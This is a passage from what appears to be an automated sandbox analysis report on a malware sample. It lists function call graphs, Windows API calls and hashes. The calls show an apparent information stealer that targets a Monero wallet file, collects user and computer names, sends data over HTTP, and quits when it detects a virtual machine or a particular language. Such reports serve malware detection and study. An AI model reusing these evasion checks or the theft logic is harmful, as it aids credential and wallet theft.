                              • Part of subcall function 00E5AC30: lstrcpy.KERNEL32(00000000,?), ref: 00E5AC82
                              • Part of subcall function 00E5AC30: lstrcat.KERNEL32(00000000), ref: 00E5AC92
                            • InternetCloseHandle.WININET(00000000), ref: 00E44F1F
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            • Associated: 00000000.00000002.2095759467.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000E6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000001116000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000012C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096204817.00000000013D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096302079.0000000001570000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096314735.0000000001571000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                            • String ID: "$"$------$------$------
                            • API String ID: 460715078-2180234286
                            • Opcode ID: 63892b7816de601d8bf02586df4e20e31643fe0071d5c3da5b094a7d12abb775
                            • Instruction ID: dd5f411c14d497cc87949600c29b12ce26de4050a48b1c3cf7f0440df3216d59
                            • Opcode Fuzzy Hash: 63892b7816de601d8bf02586df4e20e31643fe0071d5c3da5b094a7d12abb775
                            • Instruction Fuzzy Hash: 7612DC72910118ABCB55EB90DD62FEEB3B9AF14301F185AA9F50672091DF706B4CCFA1
                            Function 00E55760 Relevance: 23.1, APIs: 7, Strings: 6, Instructions: 383sleepCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1090 e55760-e557c7 call e55d20 call e5ab30 * 3 call e5aa50 * 4 1106 e557cc-e557d3 1090->1106 1107 e557d5-e55806 call e5ab30 call e5aab0 call e41590 call e55440 1106->1107 1108 e55827-e5589c call e5aa50 * 2 call e41590 call e55510 call e5abb0 call e5ab10 call e5ade0 StrCmpCA 1106->1108 1124 e5580b-e55822 call e5abb0 call e5ab10 1107->1124 1134 e558e3-e558f9 call e5ade0 StrCmpCA 1108->1134 1137 e5589e-e558de call e5aab0 call e41590 call e55440 call e5abb0 call e5ab10 1108->1137 1124->1134 1139 e55a2c-e55a94 call e5abb0 call e5ab30 * 2 call e416b0 call e5ab10 * 4 call e41670 call e41550 1134->1139 1140 e558ff-e55906 1134->1140 1137->1134 1271 e55d13-e55d16 1139->1271 1142 e5590c-e55913 1140->1142 1143 e55a2a-e55aaf call e5ade0 StrCmpCA 1140->1143 1146 e55915-e55969 call e5ab30 call e5aab0 call e41590 call e55440 call e5abb0 call e5ab10 1142->1146 1147 e5596e-e559e3 call e5aa50 * 2 call e41590 call e55510 call e5abb0 call e5ab10 call e5ade0 StrCmpCA 1142->1147 1161 e55ab5-e55abc 1143->1161 1162 e55be1-e55c49 call e5abb0 call e5ab30 * 2 call e416b0 call e5ab10 * 4 call e41670 call e41550 1143->1162 1146->1143 1147->1143 1250 e559e5-e55a25 call e5aab0 call e41590 call e55440 call e5abb0 call e5ab10 1147->1250 1167 e55ac2-e55ac9 1161->1167 1168 e55bdf-e55c64 call e5ade0 StrCmpCA 1161->1168 1162->1271 1175 e55b23-e55b98 call e5aa50 * 2 call e41590 call e55510 call e5abb0 call e5ab10 call e5ade0 StrCmpCA 1167->1175 1176 e55acb-e55b1e call e5ab30 call e5aab0 call e41590 call e55440 call e5abb0 call e5ab10 1167->1176 1197 e55c66-e55c71 Sleep 1168->1197 1198 e55c78-e55ce1 call e5abb0 call e5ab30 * 2 call e416b0 call e5ab10 * 4 call e41670 call e41550 1168->1198 1175->1168 1276 e55b9a-e55bda call e5aab0 call e41590 call e55440 call e5abb0 call e5ab10 1175->1276 1176->1168 1197->1106 1198->1271 1250->1143 1276->1168
                            APIs
                              • Part of subcall function 00E5AB30: lstrlen.KERNEL32(UO,?,?,00E44F55,00E60DDF), ref: 00E5AB3B
                              • Part of subcall function 00E5AB30: lstrcpy.KERNEL32(00E60DDF,00000000), ref: 00E5AB95
                              • Part of subcall function 00E5AA50: lstrcpy.KERNEL32(00E60E1A,00000000), ref: 00E5AA98
                            • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00E55894
                            • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00E558F1
                            • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00E55AA7
                              • Part of subcall function 00E5AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00E5AAF6
                              • Part of subcall function 00E55440: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00E55478
                              • Part of subcall function 00E5ABB0: lstrcpy.KERNEL32(?,00E60E1A), ref: 00E5AC15
                              • Part of subcall function 00E55510: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00E55568
                              • Part of subcall function 00E55510: lstrlen.KERNEL32(00000000), ref: 00E5557F
                              • Part of subcall function 00E55510: StrStrA.SHLWAPI(00000000,00000000), ref: 00E555B4
                              • Part of subcall function 00E55510: lstrlen.KERNEL32(00000000), ref: 00E555D3
                              • Part of subcall function 00E55510: lstrlen.KERNEL32(00000000), ref: 00E555FE
                            • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00E559DB
                            • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00E55B90
                            • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00E55C5C
                            • Sleep.KERNEL32(0000EA60), ref: 00E55C6B
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            • Associated: 00000000.00000002.2095759467.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000E6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000001116000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000012C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096204817.00000000013D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096302079.0000000001570000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096314735.0000000001571000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpylstrlen$Sleep
                            • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                            • API String ID: 507064821-2791005934
                            • Opcode ID: a63dec0dc08e5c39754f19f0909c195a0d8e9a93d5052f94cc924a211ef88e85
                            • Instruction ID: 8d1b5f07050f576054e030e7d96547648ed4340923f406250283f7c101049ff2
                            • Opcode Fuzzy Hash: a63dec0dc08e5c39754f19f0909c195a0d8e9a93d5052f94cc924a211ef88e85
                            • Instruction Fuzzy Hash: 53E174729101049BCB58FBA0ED62EED73BDAF54301F449A78F81676085EF356A4CCB92
                            Function 00E519F0 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 162COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1301 e519f0-e51a1d call e5ade0 StrCmpCA 1304 e51a27-e51a41 call e5ade0 1301->1304 1305 e51a1f-e51a21 ExitProcess 1301->1305 1309 e51a44-e51a48 1304->1309 1310 e51c12-e51c1d call e5ab10 1309->1310 1311 e51a4e-e51a61 1309->1311 1313 e51a67-e51a6a 1311->1313 1314 e51bee-e51c0d 1311->1314 1316 e51a85-e51a94 call e5ab30 1313->1316 1317 e51b41-e51b52 StrCmpCA 1313->1317 1318 e51ba1-e51bb2 StrCmpCA 1313->1318 1319 e51bc0-e51bd1 StrCmpCA 1313->1319 1320 e51b63-e51b74 StrCmpCA 1313->1320 1321 e51b82-e51b93 StrCmpCA 1313->1321 1322 e51aad-e51abe StrCmpCA 1313->1322 1323 e51acf-e51ae0 StrCmpCA 1313->1323 1324 e51a71-e51a80 call e5ab30 1313->1324 1325 e51afd-e51b0e StrCmpCA 1313->1325 1326 e51b1f-e51b30 StrCmpCA 1313->1326 1327 e51bdf-e51be9 call e5ab30 1313->1327 1328 e51a99-e51aa8 call e5ab30 1313->1328 1314->1309 1316->1314 1338 e51b54-e51b57 1317->1338 1339 e51b5e 1317->1339 1344 e51bb4-e51bb7 1318->1344 1345 e51bbe 1318->1345 1347 e51bd3-e51bd6 1319->1347 1348 e51bdd 1319->1348 1340 e51b76-e51b79 1320->1340 1341 e51b80 1320->1341 1342 e51b95-e51b98 1321->1342 1343 e51b9f 1321->1343 1330 e51ac0-e51ac3 1322->1330 1331 e51aca 1322->1331 1332 e51ae2-e51aec 1323->1332 1333 e51aee-e51af1 1323->1333 1324->1314 1334 e51b10-e51b13 1325->1334 1335 e51b1a 1325->1335 1336 e51b32-e51b35 1326->1336 1337 e51b3c 1326->1337 1327->1314 1328->1314 1330->1331 1331->1314 1353 e51af8 1332->1353 1333->1353 1334->1335 1335->1314 1336->1337 1337->1314 1338->1339 1339->1314 1340->1341 1341->1314 1342->1343 1343->1314 1344->1345 1345->1314 1347->1348 1348->1314 1353->1314
                            APIs
                            • StrCmpCA.SHLWAPI(00000000,block), ref: 00E51A15
                            • ExitProcess.KERNEL32 ref: 00E51A21
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            • Associated: 00000000.00000002.2095759467.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000E6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000001116000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000012C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096204817.00000000013D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096302079.0000000001570000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096314735.0000000001571000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: ExitProcess
                            • String ID: block
                            • API String ID: 621844428-2199623458
                            • Opcode ID: b9a7b9f3046bddec0e7cf83d3ae814b7a796d5098d5d1ce15f78127f4074f03d
                            • Instruction ID: ec3a320dbb74260411d8e9066e9bf09c6a600b86385d73040a07129ab0f0a435
                            • Opcode Fuzzy Hash: b9a7b9f3046bddec0e7cf83d3ae814b7a796d5098d5d1ce15f78127f4074f03d
                            • Instruction Fuzzy Hash: DA519F74A08209EFCB54DF94DA44BEE77B9EF04345F105A98F812BB280E771E989CB51
                            Function 00E56C90 Relevance: 9.1, APIs: 6, Instructions: 89sleepCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                              • Part of subcall function 00E59BB0: GetProcAddress.KERNEL32(75900000,009C1680), ref: 00E59BF1
                              • Part of subcall function 00E59BB0: GetProcAddress.KERNEL32(75900000,009C1698), ref: 00E59C0A
                              • Part of subcall function 00E59BB0: GetProcAddress.KERNEL32(75900000,009C1530), ref: 00E59C22
                              • Part of subcall function 00E59BB0: GetProcAddress.KERNEL32(75900000,009C1560), ref: 00E59C3A
                              • Part of subcall function 00E59BB0: GetProcAddress.KERNEL32(75900000,009C1578), ref: 00E59C53
                              • Part of subcall function 00E59BB0: GetProcAddress.KERNEL32(75900000,009C9888), ref: 00E59C6B
                              • Part of subcall function 00E59BB0: GetProcAddress.KERNEL32(75900000,009B7350), ref: 00E59C83
                              • Part of subcall function 00E59BB0: GetProcAddress.KERNEL32(75900000,009B7310), ref: 00E59C9C
                              • Part of subcall function 00E59BB0: GetProcAddress.KERNEL32(75900000,009C1590), ref: 00E59CB4
                              • Part of subcall function 00E59BB0: GetProcAddress.KERNEL32(75900000,009C16B0), ref: 00E59CCC
                              • Part of subcall function 00E59BB0: GetProcAddress.KERNEL32(75900000,009C15A8), ref: 00E59CE5
                              • Part of subcall function 00E59BB0: GetProcAddress.KERNEL32(75900000,009C16C8), ref: 00E59CFD
                              • Part of subcall function 00E59BB0: GetProcAddress.KERNEL32(75900000,009B73B0), ref: 00E59D15
                              • Part of subcall function 00E59BB0: GetProcAddress.KERNEL32(75900000,009C16E0), ref: 00E59D2E
                              • Part of subcall function 00E5AA50: lstrcpy.KERNEL32(00E60E1A,00000000), ref: 00E5AA98
                              • Part of subcall function 00E411D0: ExitProcess.KERNEL32 ref: 00E41211
                              • Part of subcall function 00E41160: GetSystemInfo.KERNEL32(?), ref: 00E4116A
                              • Part of subcall function 00E41160: ExitProcess.KERNEL32 ref: 00E4117E
                              • Part of subcall function 00E41110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00E4112B
                              • Part of subcall function 00E41110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00E41132
                              • Part of subcall function 00E41110: ExitProcess.KERNEL32 ref: 00E41143
                              • Part of subcall function 00E41220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00E4123E
                              • Part of subcall function 00E41220: __aulldiv.LIBCMT ref: 00E41258
                              • Part of subcall function 00E41220: __aulldiv.LIBCMT ref: 00E41266
                              • Part of subcall function 00E41220: ExitProcess.KERNEL32 ref: 00E41294
                              • Part of subcall function 00E56A10: GetUserDefaultLangID.KERNEL32 ref: 00E56A14
                              • Part of subcall function 00E41190: ExitProcess.KERNEL32 ref: 00E411C6
                              • Part of subcall function 00E579E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00E411B7), ref: 00E57A10
                              • Part of subcall function 00E579E0: RtlAllocateHeap.NTDLL(00000000), ref: 00E57A17
                              • Part of subcall function 00E579E0: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00E57A2F
                              • Part of subcall function 00E57A70: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00E57AA0
                              • Part of subcall function 00E57A70: RtlAllocateHeap.NTDLL(00000000), ref: 00E57AA7
                              • Part of subcall function 00E57A70: GetComputerNameA.KERNEL32(?,00000104), ref: 00E57ABF
                              • Part of subcall function 00E5ACC0: lstrlen.KERNEL32(?,009C99B8,?,\Monero\wallet.keys,00E60E1A), ref: 00E5ACD5
                              • Part of subcall function 00E5ACC0: lstrcpy.KERNEL32(00000000), ref: 00E5AD14
                              • Part of subcall function 00E5ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00E5AD22
                              • Part of subcall function 00E5ABB0: lstrcpy.KERNEL32(?,00E60E1A), ref: 00E5AC15
                            • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,009C97A8,?,00E610F4,?,00000000,?,00E610F8,?,00000000,00E60AF3), ref: 00E56D6A
                            • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00E56D88
                            • CloseHandle.KERNEL32(00000000), ref: 00E56D99
                            • Sleep.KERNEL32(00001770), ref: 00E56DA4
                            • CloseHandle.KERNEL32(?,00000000,?,009C97A8,?,00E610F4,?,00000000,?,00E610F8,?,00000000,00E60AF3), ref: 00E56DBA
                            • ExitProcess.KERNEL32 ref: 00E56DC2
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            • Associated: 00000000.00000002.2095759467.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000E6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000001116000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000012C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096204817.00000000013D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096302079.0000000001570000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096314735.0000000001571000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                            • String ID:
                            • API String ID: 2525456742-0
                            • Opcode ID: 1f84693c8b396bc7eda7b4d279d542d020ccea337e8f3b57a892dc336ca0feca
                            • Instruction ID: 6cfcbfa1ad08ade7f1c76e777dec75e5b1630cba00c7649f2c9db3494efd60c1
                            • Opcode Fuzzy Hash: 1f84693c8b396bc7eda7b4d279d542d020ccea337e8f3b57a892dc336ca0feca
                            • Instruction Fuzzy Hash: 3F313431A401049BCB04F7F0DD66AEEB3B5AF04342F482E68F91276182DF706549C762
                            Function 00E41220 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1436 e41220-e41247 call e58b40 GlobalMemoryStatusEx 1439 e41273-e4127a 1436->1439 1440 e41249-e41271 call e5dd30 * 2 1436->1440 1442 e41281-e41285 1439->1442 1440->1442 1444 e41287 1442->1444 1445 e4129a-e4129d 1442->1445 1447 e41292-e41294 ExitProcess 1444->1447 1448 e41289-e41290 1444->1448 1448->1445 1448->1447
                            APIs
                            • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00E4123E
                            • __aulldiv.LIBCMT ref: 00E41258
                            • __aulldiv.LIBCMT ref: 00E41266
                            • ExitProcess.KERNEL32 ref: 00E41294
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            • Associated: 00000000.00000002.2095759467.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000E6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000001116000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000012C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096204817.00000000013D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096302079.0000000001570000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096314735.0000000001571000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                            • String ID: @
                            • API String ID: 3404098578-2766056989
                            • Opcode ID: 15a1fa3e82f4011c9b80e8caa80b5dd518219a752138210df7108a7308298071
                            • Instruction ID: f228b68b2b68b8589dfde517ee87dae8e1919a273f4becc8f44102a437d8d33a
                            • Opcode Fuzzy Hash: 15a1fa3e82f4011c9b80e8caa80b5dd518219a752138210df7108a7308298071
                            • Instruction Fuzzy Hash: C501A2B0D50308BADF10DFD0DD4AB9EB7B8EB10705F105898EA04F61C0C7B455858759
                            Function 00E56D93 Relevance: 6.0, APIs: 4, Instructions: 30sleepCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1450 e56d93 1451 e56daa 1450->1451 1453 e56dac-e56dc2 call e56bc0 call e55d60 CloseHandle ExitProcess 1451->1453 1454 e56d5a-e56d77 call e5ade0 OpenEventA 1451->1454 1460 e56d95-e56da4 CloseHandle Sleep 1454->1460 1461 e56d79-e56d91 call e5ade0 CreateEventA 1454->1461 1460->1451 1461->1453
                            APIs
                            • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,009C97A8,?,00E610F4,?,00000000,?,00E610F8,?,00000000,00E60AF3), ref: 00E56D6A
                            • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00E56D88
                            • CloseHandle.KERNEL32(00000000), ref: 00E56D99
                            • Sleep.KERNEL32(00001770), ref: 00E56DA4
                            • CloseHandle.KERNEL32(?,00000000,?,009C97A8,?,00E610F4,?,00000000,?,00E610F8,?,00000000,00E60AF3), ref: 00E56DBA
                            • ExitProcess.KERNEL32 ref: 00E56DC2
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            • Associated: 00000000.00000002.2095759467.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000E6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000001116000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000012C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096204817.00000000013D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096302079.0000000001570000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096314735.0000000001571000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                            • String ID:
                            • API String ID: 941982115-0
                            • Opcode ID: e3f4fa0a490e1801d8495daacbf66e4c3b2cf9aadbd47547216365fbeadd94a7
                            • Instruction ID: 4f88e9692e98c9a26034c6e895451de881dea8ff66546e6a5b072d7c483cbf7b
                            • Opcode Fuzzy Hash: e3f4fa0a490e1801d8495daacbf66e4c3b2cf9aadbd47547216365fbeadd94a7
                            • Instruction Fuzzy Hash: 4FF05E30A84209ABEB14BBA0DD0ABBE73B4AF14707F541D25FD22B62C4CBB05548CB51
                            Function 00E44800 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63stringnetworkCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                            • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00E44889
                            • InternetCrackUrlA.WININET(00000000,00000000), ref: 00E44899
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            • Associated: 00000000.00000002.2095759467.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000E6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000001116000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000012C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013C3000.00000040.00000001.01000000.00000003.sdmpDownload File
